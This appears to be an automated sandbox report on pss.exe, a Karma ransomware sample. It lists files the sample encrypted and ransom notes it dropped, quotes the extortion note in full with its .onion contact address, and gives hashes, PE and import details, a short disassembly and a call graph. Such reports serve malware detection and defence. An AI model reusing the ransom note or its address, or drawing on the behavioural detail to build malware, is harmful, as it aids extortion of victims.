.L.......K...H..rx...s+/.X..{W.......W..(..w.?.r..<O..A{..o......)saJ.m/.QS...T.p)...].a./.%E.....p.o......"..-r..}.V.7v....3*@)U...$|R...p....[a..`n.
C:\Users\user\Downloads\SUAVTZKNFL.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819881850037968
Encrypted:false
SSDEEP:24:JenOriYL4UOgUECt/IYVtzkBSe79vUXYmQ4JiutHHzCYIXUbwQUu9:YOnLGP/DMaYmziu1zCNXUPX9
MD5:7D5D6349078AF3D48CFB8FDFA864D762
SHA1:FD24369A2A8ED088BA7D0BF85D8975B9AE3CEE64
SHA-256:BFAF42EB7B5FB395A162C359F012C987E761029A95B8F31D495C33AE3F1D2A61
SHA-512:45A861E7A0541A53DD02494B48792DFCFEF57514AA18E4F45CF68926FD20E1D1FBE0579C3120A5D6E4573DA16C389D66B45BBFE7210281E6B1B25070D9B5C407
Malicious:false
Preview: =...(..(Eu ......;-l..;~$....._4..a.....}...u.9.~.5b..c...KARMAV....cj+.......$..a6....Y..%.....VQ......S...N.....+..c...c.9)......0...x.F..O.0sm}rp..5...U..../.Bi...EQ.=............L..?.t..,A.._..4.>#L.h.^'.r...._%...,.......~.m....5........}.../]...7".qH.L.....|..L..@..vq....'M.E.0....(...)D...F.....".i.\'..1..:V]...C..AT...q......4.v.:...W+...E..P.......!......Y.D..........g.QP...|3......S3..%....d.+.+.4...j..k..,.l.u;..s\...:...=b.......s.X.m..q....s4......5.9.yU|j.5...s..a ..o..@..]}}JS8._...^..:.:...S.6.(....*.......anv..D..KY.V..9C.=Xw. .;....3Y...0.4...C_..A..\e...Y.|7-h.=c...Yd..*..0..e....r..*........rI..-2..o........h+...[....'.....=....N..ow4...>+?...(^2.eI.....2..D..\.-c..L....j~...../..h...uT......\...#.v.@.UY5..Vz.]..*. .^e....6.L.......F+...s....?5..j.....?....c.hf.Y.p.b...=.....%..i.....&.Q.....51K0..f'P.].r..w8......&...l....&.|..l.....i.:...k..9..4.S.R..V]^.[1Z. ..]..OfW...#....j....1..y$.p.....N.z._...Ji9..._jg..x.,.e
C:\Users\user\Downloads\SUAVTZKNFL.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.835811565860034
Encrypted:false
SSDEEP:24:V1Ls12JzawKjQFxcUR6YrQvNCS7oLGjHAxUOK4iVwvNNiX:V1LX+kxc4KNxwGjlikwVNM
MD5:ABB83A271D244C6A0FE3FA248507B939
SHA1:25E5682EDF7F498EF6DE78D93F7FDF2CB7B86C34
SHA-256:02D35019B907AD429C9261B3C77101224C341D0A639B21F1FDE61423B1F81DA1
SHA-512:2A22AD9CC67692F1599B61A3483F5466F393CFAE0A9C69B686D3A61C98ED40AF686B245D1444E5763A40E861BD00B3330EA97FB628D08EAAD492E604926E3A3A
Malicious:false
Preview: w.Q.FjV..0.!y._.4..iFD.....x.......[.n.v........V..S......N.a...KARMAk\.~p..T.!.]|..+JGS.8d.f.F_.."...Z.M..o..w^;Pj.~......$..!H\.(.!....s.:.X<8.....?X.t......@......:....V..{..9..>6k...F..[.m3p...n.t..6.Zh.$.JF/.......X.3..[.^.c+.<.1._.9V.A..E.~;E.wNhx.].F....J.j?).}.Zl.?...0.MM*...#.?.g..kO..=..nT..9...Z.y....>..}.%=..............@./4+.*V...e/..........?M...6`.#..p..4......n...B..wJ|......_...1..f s.].wi..1$d...E.v..m.}..c.{n[....B(..H...)U...~.....r.e..G.ct.w,u...s...P....Qc.........-.a....D..6..c.z.l./]...:..\...E`..8.r.74...az8..;;...4l.p@...7.J...z!9J.O....s.`T.Xxpo.>..BNh0..^...P.l..6......:..+....e(..m.h.(..=.o.Wk.4@.M..gA....#...2.b....e.....".."...cP~.O:.....kT.:H......`l^@J....s=....o.(..........k.."..../.7e.-...Ok.....;.}.4..o.g....+.0.....(.......9G..S.P...+`.-.0?.<j.04..G.[..o5..>....j.h..@..L5Q_[.X0.l..u.&.oJ...JF.s>.4.90[.mID..Y`.d.uU@...0.Ou...=.$0aqa....7y.}#*..x9..z.$..O.2.'d.W..?.g......t..L...../..s#....I...u...}.g%.i.i.....
C:\Users\user\Favorites\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Favorites\Links\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Links\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Music\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Pictures\Camera Roll\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Pictures\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Videos\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\bootTel.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):149
Entropy (8bit):6.559411725000434
Encrypted:false
SSDEEP:3:lCz7J/7ecncMusTWDllKbudX4oSwbkHSRhwLCIkNAn:sh7L4D/pX41wAHS6SA
MD5:21DA043152AF5C37C9A0CEE3D8BE54E3
SHA1:0B219524456E38CA98016527BA74AC524CEEC9DB
SHA-256:22016881962DD540274D9365CE515AE89857BD6D7D8252AA9FDF20B002511CBB
SHA-512:AF15C753E2BA518691021C4415991CE28A6F18AB3EE258F4A254D6DFDAC0981B4CF4021B4BAC490B36E7894FD7D9FE9941F619ED2E4F2EFEE6F0CF83C52C9DC2
Malicious:false
Preview: ...?....;.....9......O..".'y.....]....$...s+N.g .FjjI..rY.....KARMA=..f.l.}........*.r...[D.M.P.g.K......A.....Y8p,!.M@.)Z...G..p..(..$X...%
C:\bootTel.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):149
Entropy (8bit):6.559411725000434
Encrypted:false
SSDEEP:3:lCz7J/7ecncMusTWDllKbudX4oSwbkHSRhwLCIkNAn:sh7L4D/pX41wAHS6SA
MD5:21DA043152AF5C37C9A0CEE3D8BE54E3
SHA1:0B219524456E38CA98016527BA74AC524CEEC9DB
SHA-256:22016881962DD540274D9365CE515AE89857BD6D7D8252AA9FDF20B002511CBB
SHA-512:AF15C753E2BA518691021C4415991CE28A6F18AB3EE258F4A254D6DFDAC0981B4CF4021B4BAC490B36E7894FD7D9FE9941F619ED2E4F2EFEE6F0CF83C52C9DC2
Malicious:false
Preview: ...?....;.....9......O..".'y.....]....$...s+N.g .FjjI..rY.....KARMA=..f.l.}........*.r...[D.M.P.g.K......A.....Y8p,!.M@.)Z...G..p..(..$X...%

Static File Info

General

File type:PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):5.836333489480476
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:pss.exe
File size:18944
MD5:56700917a7434e307531195e4102d7bf
SHA1:b396affd40f38c5be6ec2fc18550bbfc913fc7ea
SHA256:3ff1b90dbad5d78397fdc731c3a3c080d91fc488ac9152793b538b74a1e2d8f3
SHA512:0e232d8f5aa8d1581feb4c51ba835f014ed019bf0f91f87b49155dea52184cee57636997416d045eb6021c5628c0e37f508a7714f2502ea273d052027603616d
SSDEEP:384:f1zXE8oZBhh1z9gN4cZTQQk2f6wYZ1FLzutLjKHpQHoCMBzXcxfwy98jf8EY8eML:f1A8IBDUBtBWJQH78eMT3
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............kO..kO..kO..jN..kO..jO..kOu.hN..kO].bN..kO].iN..kORich..kO........PE..L...q..`.................,..........p........@....@

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x401b70
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x60D60B71 [Fri Jun 25 16:59:29 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:600ef9c591d4987fe4f2cf55157c3925
Instruction
push ebp
mov ebp, esp
lea edx, dword ptr [ebp-0000020Ch]
mov eax, 00404180h
sub eax, edx
lea ecx, dword ptr [ebp-0000020Ch]
sub esp, 0000020Ch
sar eax, 1
sub ecx, 02h
inc eax
push esi
lea edx, dword ptr [eax+eax]
movzx eax, word ptr [edx+ecx]
lea ecx, dword ptr [ecx+02h]
mov word ptr [ecx], ax
test ax, ax
jne 00007FAC0498B113h
lea ecx, dword ptr [ebp-0000020Ch]
mov edx, 00404368h
movzx eax, word ptr [ecx]
add ecx, 02h
test ax, ax
jne 00007FAC0498B117h
sub ecx, 04h
nop
movzx eax, word ptr [edx]
lea ecx, dword ptr [ecx+02h]
mov word ptr [ecx], ax
lea edx, dword ptr [edx+02h]
test ax, ax
jne 00007FAC0498B111h
xor eax, eax
cmp word ptr [ebp-0000020Ch], ax
je 00007FAC0498B132h
nop dword ptr [eax+00h]
inc eax
cmp word ptr [ebp+eax*2-0000020Ch], 0000h
jne 00007FAC0498B116h
push 00000000h
push 00000000h
push eax
lea eax, dword ptr [ebp-0000020Ch]
push eax
push FFFFFFF5h
call dword ptr [004040A0h]
push eax
call dword ptr [0040403Ch]
push 0040436Ch
push 00000000h
push 00000000h
call dword ptr [00404094h]
call dword ptr [00404088h]
cmp eax, 000000B7h
je 00007FAC0498B1ECh
call 00007FAC0498B779h
xor edx, edx
mov dword ptr [00406000h], eax
mov ecx, 004041C8h
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x545c0x50.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x53600x38.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x40000xd0.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x2b2d0x2c00False0.508345170455data6.37784567801IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x40000x189e0x1a00False0.416466346154data4.18177599378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x60000x1c0x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
DLLImport
KERNEL32.dllWriteConsoleW, GetProcAddress, GetProcessHeap, ReadFile, FindFirstFileW, GetFileSizeEx, SetLastError, HeapAlloc, FindClose, WaitForSingleObject, Sleep, CreateThread, SetFilePointerEx, MoveFileW, GetDriveTypeW, LoadLibraryW, CloseHandle, GlobalAlloc, LoadLibraryA, GetLastError, GetFileAttributesW, CreateFileW, CreateMutexA, GetTempPathW, WriteFile, GetStdHandle, HeapFree, ExitProcess, FindNextFileW, GetCommandLineW
USER32.dllDrawTextW, SystemParametersInfoW, ReleaseDC, GetSystemMetrics, GetDC
GDI32.dllGetPixel, DeleteDC, GetTextExtentPoint32W, SetTextColor, SetBkMode, SetBkColor, DeleteObject, CreateFontW, SetPixel, CreateCompatibleDC, CreateDIBSection, SelectObject, CreateCompatibleBitmap, BitBlt

Network Behavior

Download Network PCAP: filteredfull

TimestampSource PortDest PortSource IPDest IP
Aug 19, 2021 06:00:42.755122900 CEST5864353192.168.2.38.8.8.8
Aug 19, 2021 06:00:42.788742065 CEST53586438.8.8.8192.168.2.3
Aug 19, 2021 06:00:42.920614958 CEST6098553192.168.2.38.8.8.8
Aug 19, 2021 06:00:42.969479084 CEST53609858.8.8.8192.168.2.3
Aug 19, 2021 06:00:46.852415085 CEST5020053192.168.2.38.8.8.8
Aug 19, 2021 06:00:46.890532017 CEST53502008.8.8.8192.168.2.3
Aug 19, 2021 06:00:57.799537897 CEST5128153192.168.2.38.8.8.8
Aug 19, 2021 06:00:57.824424028 CEST53512818.8.8.8192.168.2.3

Code Manipulations

Statistics

CPU Usage

01020s020406080100

Click to jump to process

Memory Usage

01020s0.0051015MB

Click to jump to process

High Level Behavior Distribution

  • File
  • Registry

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: pss.exe PID: 3296 Parent PID: 4908

Function Logs

General

Start time:06:00:48
Start date:19/08/2021
Path:C:\Users\user\Desktop\pss.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\pss.exe'
Imagebase:0x400000
File size:18944 bytes
MD5 hash:56700917A7434E307531195E4102D7BF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Show Windows behavior

Registry Activities

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Show Windows behavior

Thread Activities

Show Windows behavior

Memory Activities

Show Windows behavior

System Activities

Show Windows behavior

LPC Port Activities

Analysis Process: conhost.exe PID: 2988 Parent PID: 3296

Function Logs

General

Start time:06:00:48
Start date:19/08/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6b2800000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Show Windows behavior

Registry Activities

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Show Windows behavior

Thread Activities

Show Windows behavior

Memory Activities

Show Windows behavior

System Activities

Show Windows behavior

Timing Activities

Show Windows behavior

Windows UI Activities

Show Windows behavior

LPC Port Activities

Analysis Process: WerFault.exe PID: 380 Parent PID: 3296

Function Logs

General

Start time:06:00:56
Start date:19/08/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 400
Imagebase:0xe80000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Show Windows behavior

Registry Activities

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Show Windows behavior

Thread Activities

Show Windows behavior

Memory Activities

Show Windows behavior

System Activities

Show Windows behavior

Timing Activities

Show Windows behavior

Windows UI Activities

Show Windows behavior

Process Token Activities

Show Windows behavior

Object Security Activities

Show Windows behavior

LPC Port Activities

Disassembly

Code Analysis

Analysis Process: pss.exe PID: 3296 Parent PID: 4908 pss.exeCOMMON

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:41.3%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:47.9%
Total number of Nodes:121
Total number of Limit Nodes:17

Graph

Show Legend
Hide Nodes/Edges
execution_graph 661 401b70 663 401b96 GetStdHandle WriteConsoleW CreateMutexA GetLastError 661->663 664 401c27 663->664 665 401ced 663->665 699 402280 664->699 667 401c2c 703 4021b0 667->703 669 401c3d GetCommandLineW 706 402070 669->706 672 401c55 674 4021b0 2 API calls 672->674 673 401cca 675 401df0 14 API calls 673->675 676 401c62 674->676 677 401ccf 675->677 710 401d60 676->710 679 4021b0 2 API calls 677->679 681 401cdb 679->681 680 401c6a 682 401cae 680->682 683 401c6e 680->683 761 4035d0 681->761 715 401df0 682->715 686 401df0 14 API calls 683->686 694 401c73 686->694 687 401cac 781 402320 GetTempPathW 687->781 690 4021b0 2 API calls 692 401cc0 690->692 736 402760 CreateFileW 692->736 696 4021b0 2 API calls 694->696 697 401ca1 696->697 768 402d30 697->768 700 40228b 699->700 701 40229c GetProcessHeap HeapAlloc 699->701 700->701 702 4022be 701->702 702->667 705 4021d0 GetStdHandle WriteConsoleW 703->705 705->669 707 402085 706->707 708 40208d GlobalAlloc 706->708 707->707 707->708 709 401c4d 708->709 709->672 709->673 711 401de7 710->711 714 401d68 710->714 711->680 712 401dd5 GetFileAttributesW 712->711 713 401de1 712->713 713->680 714->711 714->712 717 401e15 GetStdHandle WriteConsoleW 715->717 718 401ea0 LoadLibraryA 717->718 719 401eac 717->719 718->719 720 401ecc GetProcessHeap HeapAlloc 719->720 721 401ebc GetProcAddress 719->721 723 401f33 720->723 724 401f24 LoadLibraryA 720->724 721->720 725 401f49 723->725 726 401f3c GetProcAddress 723->726 724->723 727 401f88 725->727 728 401f7c LoadLibraryA 725->728 726->725 729 401f92 GetProcAddress 727->729 730 401fa2 727->730 728->727 729->730 730->730 731 401fd0 GetProcessHeap HeapAlloc 730->731 732 402005 731->732 733 401ff6 LoadLibraryA 731->733 734 401cb3 732->734 735 40200e GetProcAddress 732->735 733->732 734->690 735->734 737 4027a1 GetFileSizeEx 736->737 738 401cc8 736->738 739 4027c7 10 API calls 737->739 740 4027b9 737->740 738->687 741 402825 LoadLibraryW 739->741 742 402838 739->742 740->739 741->742 743 402841 GetProcAddress 742->743 745 402852 742->745 743->745 744 4029de SetFilePointerEx SetLastError WriteFile GetLastError 746 